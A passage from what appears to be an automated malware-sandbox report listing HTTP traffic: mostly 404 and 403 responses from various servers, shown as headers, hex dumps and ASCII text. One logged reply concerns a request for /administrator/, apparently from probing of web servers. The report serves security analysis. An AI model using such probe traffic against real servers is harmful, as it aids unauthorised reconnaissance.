2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 34 37 34 37 34 37 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 26 Nov 2023 05:59:31 GMTServer: Apache/2.4.58 (Unix)Content-Length: 196Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 26 Nov 2023 05:59:31 GMTServer: Apache/2.4.58 (Unix)Content-Length: 196Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=us-asciiServer: Microsoft-HTTPAPI/2.0Date: Sun, 26 Nov 2023 05:55:03 GMTConnection: closeContent-Length: 315Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 26 Nov 2023 05:59:31 GMTServer: Apache/2.4.6 (CentOS) OpenSSL/1.0.1e-fips mod_fcgid/2.3.9 PHP/5.4.16Content-Length: 212Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /administrator/ was not found on this server.</p></body></html>
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 26 Nov 2023 05:59:31 GMTServer: Apache/2.4.58 (Unix)Content-Length: 196Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 26 Nov 2023 05:59:31 GMTServer: Apache/2.4.58 (Unix)Content-Length: 196Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sun, 26 Nov 2023 05:59:31 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 94Content-Type: text/html; charset=iso-8859-1Data Raw: 46 6f 72 20 73 65 63 75 72 69 74 79 20 72 65 61 73 6f 6e 73 2c 20 74 68 69 73 20 55 52 4c 20 69 73 20 6f 6e 6c 79 20 61 63 63 65 73 73 69 62 6c 65 20 75 73 69 6e 67 20 6c 6f 63 61 6c 68 6f 73 74 20 28 31 32 37 2e 30 2e 30 2e 31 29 20 61 73 20 74 68 65 20 68 6f 73 74 6e 61 6d 65 2e Data Ascii: For security reasons, this URL is only accessible using localhost (127.0.0.1) as the hostname.
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sun, 26 Nov 2023 05:59:31 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingLast-Modified: Thu, 12 Sep 2019 15:06:38 GMTETag: W/"3fe-5925c7bf8c9e3"Content-Encoding: gzipData Raw: 32 35 63 0d 0a 1f 8b 08 00 00 00 00 00 04 03 65 53 dd 6b db 30 10 7f f7 5f 71 f3 4b 5f f2 b1 8e 6e 0f c3 0b a4 24 a3 81 76 1d 4d c6 28 a5 0c c5 3a c5 a2 b2 e4 49 a7 ba fe ef 7b b2 92 32 ba 17 1b db fa 7d de b9 ba da dd 5c 2f 8a ea 6a bd 5c f1 6d b7 d9 5d af 17 17 1f 2f e0 87 23 f8 ee a2 95 d5 3c bf 2c aa cb e5 76 0d 8d 47 f5 ad 9c a3 f7 ce ff 91 ae 0e f3 72 51 7d 98 4e 1f b4 02 43 08 9b 35 7c 79 5c 54 f3 74 98 3f 3c a0 95 5a 3d 4e a7 4c 3e 3f 8a 5c de ae ee 93 e4 f9 e2 1f 11 7e 2a 76 0d 82 c7 bf 11 03 a1 04 26 8f 2d 5a 82 5e 04 b0 6c 47 25 3b e0 2c 50 a3 03 04 f4 cf e8 67 45 f5 33 71 dd f1 65 b9 5a dd ad b7 db 45 f1 1b f7 b0 1d 3f 83 60 18 4a f4 bd 36 72 26 88 4d bc 9d 62 8f d9 c8 3c 77 50 a4 18 05 00 4c e1 97 55 ce 53 b4 82 d0 0c 13 b8 d1 b5 77 c1 29 82 86 ad 08 29 d9 9d 80 da 20 1b 00 8b 7d 06 95 0a 05 45 8f 25 90 83 8d 25 f4 16 09 d6 2f 9d 71 9e 8d c2 46 b1 71 04 c2 17 02 a7 32 46 58 18 9b 3c 0b d0 62 08 e2 80 c0 d1 4a 72 0e 42 2b 8c 29 27 10 3a ac b5 d2 35 3f 0d 19 64 f8 24 53 31 f6 f3 f9 27 d8 0f 84 61 f2 bf 20 37 c9 6e 6c c8 18 4d 01 5c 7f 54 3b 69 cd e0 de 45 a8 99 28 9d 4c 94 c9 99 9a 64 c8 3e 12 68 62 67 1d 33 d1 00 e4 75 fd c4 37 07 4a f3 1c 42 af a9 6e 18 6d 0c ca 8c 28 d9 b3 a7 9c e8 a4 11 ca 19 ec 12 71 8b c2 b2 4f a7 a0 76 d1 07 3c aa 8c a2 a1 e1 ba df e1 40 78 84 1a 6d e0 f6 24 a7 04 89 4a 44 43 b3 ac b5 d9 6c 41 98 5e 0c e1 14 f4 3d 7e 64 4e 24 c6 d9 43 06 a1 75 f1 d0 a4 08 ad 78 e2 5d 7d 3f 24 9e 6f d7 0d c9 30 66 40 ef fc 93 f0 e3 de f1 5c 8e 45 04 dd 76 06 bf 42 27 e4 38 d1 71 82 f9 fc 69 88 dc 4d c3 2b b2 d7 07 4e db 8e 5b 6c 34 2b 8e 9b cb f2 5d 0c 0d 97 9b 41 2e ad 51 5a 0d a5 9f 11 1a 5e f2 94 58 70 c7 d4 a3 e1 57 e3 88 a1 d5 56 b7 b1 3d e6 bf 7d eb 71 9c 1b 8f 09 5f 44 4d 66 80 3e b5 3d b8 78 c6 d1 3d 0a a9 4f e9 bd 3e 34 c4 7f 52 9f 29 f8 97 7c 05 7e a9 4a 3b fe 03 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 25ceSk0_qK_n$vM(:I{2}\/j\m]/#<,vGrQ}NC5|y\Tt?<Z=NL>?\~*v&-Z^lG%;,PgE3qeZE?`J6r&Mb<wPLUSw)) }E%%/qFq2FX<bJrB+)':5?d$S1'a 7nlM\T;iE(Ld>hbg3u7JBnm(qOv<@xm$JDClA^=~dN$Cux]}?$o0f@\EvB'8qiM+N[l4+]A.QZ^XpWV=}q_DMf>=x=O>4R)|~J;0
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 26 Nov 2023 05:59:31 GMTContent-Type: text/html; charset=utf-8Content-Length: 125Connection: keep-aliveServer: ip-10-123-122-167.ec2.internalX-Request-Id: f953fd7d-07e5-4972-a064-412a9ffdaf9eData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 27 65 6e 2d 75 73 27 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 2a 2a 20 4e 6f 74 20 46 6f 75 6e 64 20 2a 2a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 48 54 54 50 20 53 74 61 74 75 73 3a 20 34 30 34 20 28 6e 6f 74 20 66 6f 75 6e 64 29 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML><html lang='en-us'><head><title>** Not Found **</title></head><body>HTTP Status: 404 (not found)</body></html>
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 26 Nov 2023 05:59:32 GMTContent-Type: text/html; charset=utf-8Content-Length: 125Connection: keep-aliveServer: ip-10-123-122-242.ec2.internalX-Request-Id: 279bbd8c-e9fb-452d-a555-9c5c62aa2151Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 27 65 6e 2d 75 73 27 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 2a 2a 20 4e 6f 74 20 46 6f 75 6e 64 20 2a 2a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 48 54 54 50 20 53 74 61 74 75 73 3a 20 34 30 34 20 28 6e 6f 74 20 66 6f 75 6e 64 29 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML><html lang='en-us'><head><title>** Not Found **</title></head><body>HTTP Status: 404 (not found)</body></html>
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 26 Nov 2023 05:59:32 GMTContent-Type: text/html; charset=utf-8Content-Length: 125Connection: keep-aliveServer: ip-10-123-122-17.ec2.internalX-Request-Id: d75c36b2-cac0-4124-ba0b-f91fc196e22dData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 27 65 6e 2d 75 73 27 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 2a 2a 20 4e 6f 74 20 46 6f 75 6e 64 20 2a 2a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 48 54 54 50 20 53 74 61 74 75 73 3a 20 34 30 34 20 28 6e 6f 74 20 66 6f 75 6e 64 29 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML><html lang='en-us'><head><title>** Not Found **</title></head><body>HTTP Status: 404 (not found)</body></html>
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Sun, 26 Nov 2023 05:59:23 GMTContent-Length: 0Connection: keep-alivex-backend: deny_backendStrict-Transport-Security: max-age=31536000; includeSubDomains
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 26 Nov 2023 05:59:32 GMTServer: ApacheVary: accept-language,accept-charset,User-AgentAccept-Ranges: bytesTransfer-Encoding: chunkedContent-Type: text/html; charset=utf-8Content-Language: enData Raw: 63 38 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 6c 61 6e 67 3d 22 0d 0a 65 0d 0a 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 0d 0a 31 33 0d 0a 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 0d 0a 33 38 0d 0a 4f 62 6a 65 63 74 20 6e 6f 74 20 66 6f 75 6e 64 21 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 72 65 76 3d 22 6d 61 64 65 22 20 68 72 65 66 3d 22 6d 61 69 6c 74 6f 3a 0d 0a 31 31 33 0d 0a 25 35 62 6e 6f 25 32 30 61 64 64 72 65 73 73 25 32 30 67 69 76 65 6e 25 35 64 22 20 2f 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 2f 2a 2d 2d 3e 3c 21 5b 43 44 41 54 41 5b 2f 2a 3e 3c 21 2d 2d 2a 2f 20 0a 20 20 20 20 62 6f 64 79 20 7b 20 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 20 7d 0a 20 20 20 20 61 3a 6c 69 6e 6b 20 7b 20 63 6f 6c 6f 72 3a 20 23 30 30 30 30 43 43 3b 20 7d 0a 20 20 20 20 70 2c 20 61 64 64 72 65 73 73 20 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 33 65 6d 3b 7d 0a 20 20 20 20 73 70 61 6e 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 20 73 6d 61 6c 6c 65 72 3b 7d 0a 2f 2a 5d 5d 3e 2a 2f 2d 2d 3e 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 0d 0a 31 62 0d 0a 4f 62 6a 65 63 74 20 6e 6f 74 20 66 6f 75 6e 64 21 3c 2f 68 31 3e 0a 3c 70 3e 0a 0d 0a 33 39 0d 0a 0a 0a 20 20 20 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 0a 0a 20 20 0d 0a 35 37 0d 0a 0a 0a 20 20 20 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 0a 20 20 20 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 0a 0a 20 20 0d 0a 32 0d 0a 0a 0a 0d 0a 39 0d 0a 3c 2f 70 3e 0a 3c 70 3e 0a 0d 0a 34 38 0d 0a 49 66 20 79 6f 75 20 74 68 69 6e 6b 20 74 68 69 73 20 69 73 20 61 20 73 65 72 76 65 72 20 65 72 72 6f 72 2c 20 70 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 0a 74 68 65 20 3c 61 20 68 72 65 66 3d 22 6d 61 69 6c 74 6f 3a 0d 0a 32 62 0d 0a 25 35 62 6e 6f 25 32 30 61 64 64 72 65 73 73 25 32 30 67 69 76 65 6e 25 35 64 22 3e 77 65 62 6
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 26 Nov 2023 05:59:32 GMTContent-Type: text/html; charset=utf-8Content-Length: 125Connection: keep-aliveServer: ip-10-123-122-167.ec2.internalX-Request-Id: 28c2f7ec-66a8-43c7-b694-011be95364ebData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 27 65 6e 2d 75 73 27 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 2a 2a 20 4e 6f 74 20 46 6f 75 6e 64 20 2a 2a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 48 54 54 50 20 53 74 61 74 75 73 3a 20 34 30 34 20 28 6e 6f 74 20 66 6f 75 6e 64 29 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML><html lang='en-us'><head><title>** Not Found **</title></head><body>HTTP Status: 404 (not found)</body></html>
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: Keep-AliveKeep-Alive: timeout=5, max=100x-powered-by: PHP/7.2.34expires: Wed, 11 Jan 1984 05:00:00 GMTcache-control: no-cache, must-revalidate, max-age=0content-type: text/html; charset=UTF-8link: <https://samson.pe/wp-json/>; rel="https://api.w.org/"transfer-encoding: chunkedcontent-encoding: gzipvary: Accept-Encodingdate: Sun, 26 Nov 2023 05:59:32 GMTserver: LiteSpeedData Raw: 32 32 63 32 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cc 7d 5b 77 db 38 92 f0 b3 7d ce fc 07 84 39 b1 a5 6e de 25 f9 22 5b ea 71 d2 9e de ec a6 3b 99 38 d9 39 bb 49 4e 0e 44 42 12 12 92 60 03 a0 65 b5 5b 3f 66 1f f7 79 df f6 b5 ff d8 9e 02 78 13 4d c9 8e ed 9e ef cb 4c cb 24 50 a8 2a 14 aa 0a f7 e2 e9 93 90 05 72 99 12 34 97 71 34 de 3d 85 3f 28 c2 c9 6c 64 10 61 bd 39 37 20 8d e0 70 bc bb 73 1a 13 89 51 30 c7 5c 10 39 32 de bf fb 9b 75 64 94 e9 09 8e c9 c8 b8 a4 64 91 32 2e 0d 14 b0 44 92 44 8e 8c 05 0d e5 7c 14 92 4b 1a 10 4b bd 98 88 26 54 52 1c 59 22 c0 11 19 79 0a 4b 44 93 af 88 93 68 64 a4 9c 4d 69 44 0c 34 e7 64 3a 32 e6 52 a6 62 e8 38 b3 38 9d d9 8c cf 9c ab 69 e2 78 50 a8 e0 49 d1 de e7 6c c2 a4 d8 2f 29 ef 27 8c 26 21 b9 32 d1 94 45 11 5b ec 23 47 15 79 62 59 e8 dd 9c 0a 24 a8 24 88 0a c4 52 49 63 fa 1b 09 d1 82 ca 39 92 73 82 fe 83 61 21 d1 c5 f9 6b 94 46 d9 8c 26 e8 d2 f7 ec 01 b2 50 c1 cc 12 00 ec 80 c5 ce 82 f1 30 e5 44 08 47 83 0a 47 10 e6 20 cb 02 d1 48 2a 23 32 7e f3 c7 7f cd 68 82 51 c2 10 49 40 30 1c 87 18 59 e8 02 c7 82 25 e8 05 a4 b0 48 a0 37 84 ff f1 bf a7 8e 2e 54 54 2e e5 2c 25 5c 2e 47 06 9b 0d 23 06 12 ab 49 97 88 cf e7 17 06 d4 2c 6f 9f 35 70 85 a9 06 fd 4d 8c 6c c4 0a 72 fb 0c 32 af 61 6e ad 4a 8e 41 04 9c a6 12 81 9a 8d 0c 9c a6 11 0d b0 a4 2c 71 a2 f0 fb 2f 82 25 06 0a 22 2c c4 c8 50 42 b5 44 30 27 31 b6 66 1c a7 73 63 7c 6d fc 55 a9 d2 95 34 86 a5 2a 68 10 50 06 c3 34 fe aa 21 87 1f ae 8d bf 02 0d 63 68 fc 83 4c 2e a8 24 90 49 c3 7a 39 25 70 3b 25 ce d3 05 99 40 3d 0c d3 c8 78 d4 0a 62 98 86 aa e4 d0 68 af 9c 69 84 44 57 8d b2 c4 18 1a 86 69 a4 d9 24 a2 62 4e b8 31 bc de 4c 9a f1 19 4e e8 6f 4a 06 c6 ca 34 52 06 96 42 71 74 16 80 58 8c 7a 4d 2e 08 e6 c1 3c cf 30 0d 89 f9 8c 48 85 3d af ea 79 22 f9 f2 0d a3 89 d4 55 79 47 e2 34 c2 12 a4 50 e8 aa 28 6b fd 83 18 5d 0b 85 f1 b3 24 3c fe 2c 24 a7 c9 6c 05 4c fc 9a 11 be b4 68 92 66 20 68 4e 7e cd 28 27 21 52 a6 75 b3 88 b1 fa 64 1a 34 79 85 93 59 86 67 40 4c 7b 8b 95 59 35 c2 eb 7a 35 b7 b4 c4 9a 38 6e 95 f9 96 d6 8a d8 8c d5 45 f3 32 c6 33 f2 7a f2 85 04 20 9b 16 6e b7 30 e5 68 15 73 00 a7 43 01 91 b3 45 55 16 a9 95 fb 3b 27 4b 23 86 43 e1 f8 ae ef 3b ee 81 42 60 15 2d 90 80 be e6 90 ef 37 a8 dd 37 e1 52 fe d4 18 1e bb a6 31 27 74 36 97 fa 39 c0 a9 d6 a4 0d aa bb 32 0d 55 a7 ad 6a da 26 82 95 69 08 1c 93 33 61 0c 3f 94 fa b5 58 2c ec 25 cb 64 36 21 ca 23 66 82 70 e7 e2 ec e7 8b d7 bf fc f4 f6 f5 fb 37 c6 a7 d5 a7 d5 a9 a3 6d 05 1c 15 78 60 e7 86 8f b5 95 cf dc dd 3d 2d 7b 82 fd 30 11 56 ca c9 94 c8 60 be af bb 83 7d c7 01 7a 33 c6 66 11 91
